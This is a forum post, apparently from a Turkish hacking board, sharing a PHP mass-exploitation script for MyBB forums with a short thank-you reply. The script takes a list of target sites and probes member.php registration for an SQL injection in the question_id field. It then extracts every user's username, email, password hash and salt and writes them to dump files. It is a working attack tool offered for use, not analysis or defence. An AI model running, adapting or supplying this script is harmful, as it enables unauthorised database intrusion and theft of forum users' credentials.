Mybb 2015 sql injection script (1 Viewer)

Yapmanız gereken bunu bir ftpye atıp çalıştırmak ve mybb siteyi yazmak
You have to upload this script in ftp and write the mybb site

<form method="post" action="">
Siteleri kutuya yazın : <br><textarea name="siteler" cols="35" rows="7"></textarea><br>
<input type="submit" value="tara">
</form>
<?php
ob_start();
set_time_limit(0);
if(!file_exists("dumpsss")) mkdir("dumpsss");
if(! $_POST['siteler']==""){

$siteler = explode("\n",$_POST['siteler']);
foreach($siteler as $sites){
$sites=trim($sites);
        if(checkVulnerable($sites)) {
            echo "[+] $sites Is Vulnerable!\n";
            Inject($sites);
        } else {
            echo "[-] Target Is Not Vulnerable\n";
        }
    }
} else {
}

function Inject($site) {
   $get_website = parse_url($site);
   $website = $get_website["host"];
    $html = HTTPPost("$site/member.php", "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=' or polygon((select*from(select*from(select count(*) from mybb_users LIMIT 0,1)f)x))-- -");
    preg_match('!select \'(.*)\' AS!s', $html, $matches);
    $count = $matches[1];
    echo "[+] Count: $count\n";

    for($i = 0; $i <= $count; $i++) {
        if($count == 1) {
            $num = "0,1";
        } else {
            $num = "$i,1";
        }
        $html = HTTPPost("$site/member.php", "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=' or polygon((select*from(select*from(select concat(username,0x3a,email,0x3a,password,0x3a,salt) from mybb_users LIMIT $num)f)x))-- -");
        preg_match('!select \'(.*)\' AS!s', $html, $matches);
        if(isset($matches[1])) {
            $split = explode(":", $matches[1]);
            $username = $split[0];
            $email = $split[1];
            $password = $split[2];
            $salt = $split[3];
            echo "Username: $username\nEmail: $email\nPassword: $password\nSalt: $salt\n------\n";
            file_put_contents("dumpsss/$website.txt", "Username: $username\nEmail: $email\nPassword: $password\nSalt: $salt\n------\n", FILE_APPEND);
        }
    }
}

function checkVulnerable($site) {
    $ch = curl_init();
    $html = HTTPPost("$site/member.php", "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id='");
    if(strpos($html, "You have an error in your SQL syntax")!==false) {
        return true;
    } else {
        return false;
    }
}

function HTTPPost($site, $post) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$site/member.php");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
    $html = curl_exec($ch);
    curl_close($ch);
    return $html;
}
?>

 

teşekkürler hocam eline sağlık ftp erişimi hakkında bir makalede yazarsa birisi çok çok faydalı olacak bu paylaşım